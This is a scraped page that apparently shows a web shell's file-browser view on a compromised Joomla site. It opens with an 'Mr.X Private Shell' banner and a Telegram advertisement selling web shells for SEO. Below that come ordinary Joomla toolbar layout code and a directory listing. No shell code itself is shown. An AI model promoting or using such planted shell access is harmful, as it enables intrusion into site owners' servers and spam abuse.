__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
<?php
/**
* @package Helix Ultimate Framework
* @author JoomShaper https://www.joomshaper.com
* @copyright Copyright (c) 2010 - 2021 JoomShaper
* @license http://www.gnu.org/licenses/gpl-2.0.html GNU/GPLv2 or Later
*/
defined('JPATH_BASE') or die;
use Joomla\CMS\HTML\HTMLHelper;
use Joomla\CMS\Language\Text;
$selector = $displayData['selector'];
$id = isset($displayData['id']) ? $displayData['id'] : '';
$class = isset($displayData['class']) ? $displayData['class'] : 'btn btn-secondary btn-sm';
$icon = isset($displayData['icon']) ? $displayData['icon'] : 'fas fa-download';
$text = isset($displayData['text']) ? $displayData['text'] : '';
// Render the modal
echo HTMLHelper::_('bootstrap.renderModal',
'modal_'. $selector,
array(
'url' => $displayData['doTask'],
'title' => $text,
'height' => '100%',
'width' => '100%',
'modalWidth' => 80,
'bodyHeight' => 60,
'closeButton' => true,
'footer' => '<a class="btn btn-secondary" data-bs-dismiss="modal" type="button"'
. ' onclick="window.parent.jQuery(\'#modal_downloadModal\').modal(\'hide\');">'
. Text::_("COM_BANNERS_CANCEL") . '</a>'
. '<button class="btn btn-success" type="button"'
. ' onclick="jQuery(\'#modal_downloadModal iframe\').contents().find(\'#exportBtn\').click();">'
. Text::_("COM_BANNERS_TRACKS_EXPORT") . '</button>',
)
);
?>
<button id="<?php echo $id; ?>" onclick="jQuery('#modal_<?php echo $selector; ?>').modal('show')" class="<?php echo $class; ?>" data-bs-toggle="modal" title="<?php echo $text; ?>">
<span class="icon-<?php echo $icon; ?>" aria-hidden="true"></span><?php echo $text; ?>
</button>
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| group | Folder | 0775 |
|
|
| apply.php | File | 1.1 KB | 0664 |
|
| base.php | File | 295 B | 0664 |
|
| batch.php | File | 1.02 KB | 0664 |
|
| confirm.php | File | 745 B | 0664 |
|
| containerclose.php | File | 263 B | 0664 |
|
| containeropen.php | File | 423 B | 0664 |
|
| help.php | File | 718 B | 0664 |
|
| iconclass.php | File | 297 B | 0664 |
|
| link.php | File | 805 B | 0664 |
|
| modal.php | File | 1.65 KB | 0664 |
|
| popup.php | File | 844 B | 0664 |
|
| separator.php | File | 253 B | 0664 |
|
| slider.php | File | 896 B | 0664 |
|
| standard.php | File | 1.1 KB | 0664 |
|
| title.php | File | 498 B | 0664 |
|
| versions.php | File | 1.34 KB | 0664 |
|